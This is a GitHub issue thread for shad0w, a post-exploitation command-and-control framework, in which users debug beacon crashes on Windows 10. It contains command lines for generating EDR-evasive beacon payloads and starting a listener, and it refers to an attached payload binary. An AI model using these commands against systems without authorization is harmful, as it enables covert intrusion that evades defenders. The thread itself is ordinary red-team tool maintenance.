bats3c / shad0w

A post exploitation framework designed to operate covertly on heavily monitored environments
https://blog.dylan.codes/shad0w/
MIT License

Assertion failed: jso->_ref_count > 0, file json_object.c, line 192 #88

Closed quentinhardy closed 3 years ago

quentinhardy commented 3 years ago

Hello,

I'm testing the project. Good work. Very interesting.

I have generated these 2 payloads:

shad0w beacon -p x64/windows/secure/static -H IP -f raw -o payload_static.bin
shad0w beacon -p x64/windows/secure -H IP -f raw -o payload_staged.bin

I have a connection back to the C2 for these 2 payloads but after, I have the following error in the output of the payload (on the target):

Assertion failed: jso->_ref_count > 0, file json_object.c, line 192

The beacon crashes on the target.

I can not stop the beacon on the C2. I can't execute Shad0w commands on the beacon.

The target is a Microsoft Windows 10 Home (10.0.19042 N/A Build 19042).

Have I made a mistake somewhere?

Best regards,

bats3c commented 3 years ago

I've never encountered this error before, thanks for reporting it.

It seems like the C2 is causing this behaviour.

Could you show me the command you used to start it?

quentinhardy commented 3 years ago

I have used shad0w listen -e MY_IP_ADDRESS. I have followed https://blog.dylan.codes/shad0w/ for installation.

quentinhardy commented 3 years ago

Hello,

I have the same error with the exe output: sudo shad0w beacon -p x64/windows/secure -H IP -f exe -o theExe.exe. It is the same Windows machine, and in this case Defender AV is disabled.

Do you have a debug option for the beacon that would help you?

bats3c commented 3 years ago

Hey thanks for letting me know, I'm attempting to replicate this. Would it be possible to attach a copy of the faulting beacon?

Yes, you can use the -d flag for both the server and the beacon to run them in debug mode.

quentinhardy commented 3 years ago

Of course, see attachment payload_x64_shad0w_192.168.43.150.exe.zip.

Password for the zip file: password

sudo shad0w beacon -p x64/windows/secure -H 192.168.43.150 -f exe -o payload_x64_shad0w_192.168.43.150.exe
The secure payload makes heavy use of new Windows features and ntdll API hooking. This can
make the payload a lot more resistant to EDR products, but can also make it more unstable.
It has been tested on:
    x64 Windows 8.1, x64 Windows 10 (Pro & Enterprise)
    x64 Windows Server 2019
It may work on other systems as well.

[+] Created payload_x64_shad0w_192.168.43.150.exe (340992 bytes)

With the -d option, I don't see any debug output from the beacon/exe. Is that normal? The -d flag on the C2 side does not show me any debug output that is useful for understanding the error.

quentinhardy commented 3 years ago

Hi,

I have done the same test on Windows 10 Pro, version 1903 (OS build 18362.592), without Defender enabled, and I have exactly the same error.

Command lines I have tested:

shad0w beacon -p x64/windows/secure -H IP -f exe -o theExe.exe
shad0w beacon -p x64/windows/secure -H IP -f exe -d -o theExe.exe
shad0w beacon -p x64/windows/secure/static -H IP -f raw -d -o theRaw.raw
shad0w beacon -p x64/windows/secure -H IP -f raw -d -o theRaw.raw

I have tested the raw output (staged and static) with my loader and I get the same error.

I see the connection back on the C2 side for these 4 tests, but then the same JSON error again:

[i] Sending stage IP --> IP (882456 bytes)
[i] Beacon: USER@MACHINENAME (ARCH: x64, OS: Windows 10, Type: SECURE)

Important notice: with the static binary (exe), I do not get the error:

shad0w beacon -p x64/windows/secure/static -H IP -f exe -d -o theExe.exe

sevagas commented 3 years ago

Hi, exactly the same error here with both the static binary and the secure one. The only one working is the non-static, non-secure one (with Defender disabled).

bats3c commented 3 years ago

I've been able to replicate it; I'm working on a fix. Should be fixed in the next couple of days.

quentinhardy commented 3 years ago

I will retest when the fix is published. I will keep you informed.

bats3c commented 3 years ago

This issue should be fixed now with the latest commit. I've reworked the JSON parser so the beacons now use a new one.

This also has the added benefit of halving the size of the static beacons.

The issue shouldn't persist for anyone, though you may encounter some other bugs as this was a rather large change to the code base (although I'm pretty sure there won't be any).

Please give it a go and let me know if you encounter any issues.